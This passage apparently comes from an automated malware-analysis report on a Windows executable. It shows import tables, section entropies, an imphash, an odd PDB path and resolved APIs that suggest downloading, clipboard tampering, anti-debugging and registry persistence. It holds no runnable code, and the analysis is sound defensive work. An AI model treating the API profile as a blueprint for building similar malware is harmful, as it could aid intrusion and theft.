- "name": "MultiByteToWideChar",
- "address": "0x42b100"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42b104"
- },
- {
- "name": "HeapSize",
- "address": "0x42b108"
- },
- {
- "name": "HeapFree",
- "address": "0x42b10c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42b110"
- },
- {
- "name": "SetLastError",
- "address": "0x42b114"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42b118"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42b11c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42b120"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42b124"
- },
- {
- "name": "GetFileType",
- "address": "0x42b128"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42b12c"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42b130"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x42b134"
- },
- {
- "name": "WriteFile",
- "address": "0x42b138"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42b13c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42b140"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42b144"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42b148"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42b14c"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42b150"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42b154"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42b158"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42b15c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42b160"
- },
- {
- "name": "Sleep",
- "address": "0x42b164"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42b168"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42b16c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42b170"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42b174"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42b178"
- },
- {
- "name": "TlsFree",
- "address": "0x42b17c"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42b180"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42b184"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42b188"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42b18c"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42b190"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42b194"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42b198"
- },
- {
- "name": "GetACP",
- "address": "0x42b19c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42b1a0"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42b1a4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42b1a8"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42b1ac"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42b1b0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42b1b4"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42b1b8"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42b1bc"
- },
- {
- "name": "CompareStringW",
- "address": "0x42b1c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42b1c4"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42b1c8"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42b1cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42b1d0"
- },
- {
- "name": "CloseHandle",
- "address": "0x42b1d4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetMenuBarInfo",
- "address": "0x42b1dc"
- },
- {
- "name": "DrawTextExA",
- "address": "0x42b1e0"
- },
- {
- "name": "SetWindowsHookA",
- "address": "0x42b1e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x42b1e8"
- },
- {
- "name": "GetOpenClipboardWindow",
- "address": "0x42b1ec"
- },
- {
- "name": "ClientToScreen",
- "address": "0x42b1f0"
- }
- ],
- "dll": "USER32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0005251b",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x0005251b",
- "icon_hash": null,
- "entrypoint": "0x00407b76",
- "timestamp": "2018-07-23 08:18:02",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00029600",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x000294dd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002b000",
- "size_of_data": "0x00013200",
- "entropy": "6.07",
- "raw_address": "0x00029a00",
- "virtual_size": "0x000130b2",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x00002200",
- "entropy": "2.74",
- "raw_address": "0x0003cc00",
- "virtual_size": "0x00014cc8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00054000",
- "size_of_data": "0x00006400",
- "entropy": "6.31",
- "raw_address": "0x0003ee00",
- "virtual_size": "0x000063b0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0005b000",
- "size_of_data": "0x00002400",
- "entropy": "6.55",
- "raw_address": "0x00045200",
- "virtual_size": "0x000022a0",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d4fc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x00054000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000063b0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000022a0"
- },
- {
- "virtual_address": "0x0002b250",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0002b000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001f8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "1f9917f590ed0711a560b3a3a279ed67",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.SetErrorMode",
- "msvcrt.dll._controlfp",
- "msvcrt.dll._except_handler3",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__p__fmode",
- "msvcrt.dll.isalpha",
- "msvcrt.dll.__p__commode",
- "msvcrt.dll._adjust_fdiv",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._initterm",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll._acmdln",
- "msvcrt.dll.exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll._exit",
- "msvcrt.dll._snprintf",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fseek",
- "msvcrt.dll.ftell",
- "msvcrt.dll.wcsstr",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.srand",
- "msvcrt.dll.rand",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "wininet.dll.InternetOpenUrlA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetOpenA",
- "urlmon.dll.URLDownloadToFileW",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathFindFileNameA",
- "shlwapi.dll.PathFindFileNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.FindClose",
- "kernel32.dll.WriteFile",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.CreateProcessW",
- "user32.dll.SetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetClipboardData",
- "user32.dll.CloseClipboard",
- "user32.dll.CharUpperA",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegOpenKeyExW",
- "shell32.dll.ShellExecuteW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "msvcr100.dll.atexit",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.OpenServiceA",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FillConsoleOutputCharacterA",
- "address": "0x42b000"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42b004"
- },
- {
- "name": "GetNativeSystemInfo",
- "address": "0x42b008"
- },
- {
- "name": "SetLocaleInfoA",
- "address": "0x42b00c"
- },
- {
- "name": "WritePrivateProfileStructA",
- "address": "0x42b010"
- },
- {
- "name": "GetDefaultCommConfigW",
- "address": "0x42b014"
- },
- {
- "name": "FindResourceW",
- "address": "0x42b018"
- },
- {
- "name": "WaitNamedPipeA",
- "address": "0x42b01c"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x42b020"
- },
- {
- "name": "SetTapeParameters",
- "address": "0x42b024"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42b028"
- },
- {
- "name": "GetTickCount",
- "address": "0x42b02c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x42b030"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42b034"
- },
- {
- "name": "FormatMessageA",
- "address": "0x42b038"
- },
- {
- "name": "EnumTimeFormatsA",
- "address": "0x42b03c"
- },
- {
- "name": "EnumTimeFormatsW",
- "address": "0x42b040"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42b044"
- },
- {
- "name": "GetFirmwareEnvironmentVariableA",
- "address": "0x42b048"
- },
- {
- "name": "GetStringTypeExW",
- "address": "0x42b04c"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42b050"
- },
- {
- "name": "GetVolumePathNamesForVolumeNameW",
- "address": "0x42b054"
- },
- {
- "name": "ReplaceFileW",
- "address": "0x42b058"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x42b05c"
- },
- {
- "name": "CreateMailslotW",
- "address": "0x42b060"
- },
- {
- "name": "WritePrivateProfileStringW",
- "address": "0x42b064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x42b068"
- },
- {
- "name": "VerifyVersionInfoW",
- "address": "0x42b06c"
- },
- {
- "name": "GetProfileIntA",
- "address": "0x42b070"
- },
- {
- "name": "Module32First",
- "address": "0x42b074"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42b078"
- },
- {
- "name": "GetLongPathNameA",
- "address": "0x42b07c"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x42b080"
- },
- {
- "name": "HeapUnlock",
- "address": "0x42b084"
- },
- {
- "name": "MoveFileW",
- "address": "0x42b088"
- },
- {
- "name": "GetAtomNameA",
- "address": "0x42b08c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42b090"
- },
- {
- "name": "FindFirstVolumeMountPointW",
- "address": "0x42b094"
- },
- {
- "name": "OpenEventA",
- "address": "0x42b098"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x42b09c"
- },
- {
- "name": "OpenJobObjectW",
- "address": "0x42b0a0"
- },
- {
- "name": "GetThreadPriority",
- "address": "0x42b0a4"
- },
- {
- "name": "FindFirstChangeNotificationA",
- "address": "0x42b0a8"
- },
- {
- "name": "WriteProfileStringW",
- "address": "0x42b0ac"
- },
- {
- "name": "MoveFileWithProgressW",
- "address": "0x42b0b0"
- },
- {
- "name": "GetConsoleProcessList",
- "address": "0x42b0b4"
- },
- {
- "name": "ExpandEnvironmentStringsW",
- "address": "0x42b0b8"
- },
- {
- "name": "CreateFileW",
- "address": "0x42b0bc"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42b0c0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42b0c4"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42b0c8"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42b0cc"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42b0d0"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42b0d4"
- },
- {
- "name": "EncodePointer",
- "address": "0x42b0d8"
- },
- {
- "name": "DecodePointer",
- "address": "0x42b0dc"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42b0e0"
- },
- {
- "name": "RaiseException",
- "address": "0x42b0e4"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42b0e8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42b0ec"
- },
- {
- "name": "GetLastError",
- "address": "0x42b0f0"
- },
- {
- "name": "ExitProcess",
- "address": "0x42b0f4"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42b0f8"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x42b0fc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42b100"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x42b104"
- },
- {
- "name": "HeapSize",
- "address": "0x42b108"
- },
- {
- "name": "HeapFree",
- "address": "0x42b10c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x42b110"
- },
- {
- "name": "SetLastError",
- "address": "0x42b114"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x42b118"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x42b11c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x42b120"
- },
- {
- "name": "GetStdHandle",
- "address": "0x42b124"
- },
- {
- "name": "GetFileType",
- "address": "0x42b128"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42b12c"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x42b130"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x42b134"
- },
- {
- "name": "WriteFile",
- "address": "0x42b138"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x42b13c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x42b140"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x42b144"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x42b148"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x42b14c"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x42b150"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x42b154"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x42b158"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x42b15c"
- },
- {
- "name": "CreateEventW",
- "address": "0x42b160"
- },
- {
- "name": "Sleep",
- "address": "0x42b164"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x42b168"
- },
- {
- "name": "TerminateProcess",
- "address": "0x42b16c"
- },
- {
- "name": "TlsAlloc",
- "address": "0x42b170"
- },
- {
- "name": "TlsGetValue",
- "address": "0x42b174"
- },
- {
- "name": "TlsSetValue",
- "address": "0x42b178"
- },
- {
- "name": "TlsFree",
- "address": "0x42b17c"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x42b180"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x42b184"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x42b188"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x42b18c"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x42b190"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42b194"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x42b198"
- },
- {
- "name": "GetACP",
- "address": "0x42b19c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x42b1a0"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42b1a4"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x42b1a8"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x42b1ac"
- },
- {
- "name": "FreeLibrary",
- "address": "0x42b1b0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42b1b4"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x42b1b8"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x42b1bc"
- },
- {
- "name": "CompareStringW",
- "address": "0x42b1c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x42b1c4"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x42b1c8"
- },
- {
- "name": "IsValidLocale",
- "address": "0x42b1cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42b1d0"
- },
- {
- "name": "CloseHandle",
- "address": "0x42b1d4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetMenuBarInfo",
- "address": "0x42b1dc"
- },
- {
- "name": "DrawTextExA",
- "address": "0x42b1e0"
- },
- {
- "name": "SetWindowsHookA",
- "address": "0x42b1e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x42b1e8"
- },
- {
- "name": "GetOpenClipboardWindow",
- "address": "0x42b1ec"
- },
- {
- "name": "ClientToScreen",
- "address": "0x42b1f0"
- }
- ],
- "dll": "USER32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0005251b",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x0005251b",
- "icon_hash": null,
- "entrypoint": "0x00407b76",
- "timestamp": "2018-07-23 08:18:02",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00029600",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x000294dd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002b000",
- "size_of_data": "0x00013200",
- "entropy": "6.07",
- "raw_address": "0x00029a00",
- "virtual_size": "0x000130b2",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x00002200",
- "entropy": "2.74",
- "raw_address": "0x0003cc00",
- "virtual_size": "0x00014cc8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00054000",
- "size_of_data": "0x00006400",
- "entropy": "6.31",
- "raw_address": "0x0003ee00",
- "virtual_size": "0x000063b0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0005b000",
- "size_of_data": "0x00002400",
- "entropy": "6.55",
- "raw_address": "0x00045200",
- "virtual_size": "0x000022a0",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d4fc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x00054000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000063b0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000022a0"
- },
- {
- "virtual_address": "0x0002b250",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0002b000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001f8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "1f9917f590ed0711a560b3a3a279ed67",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }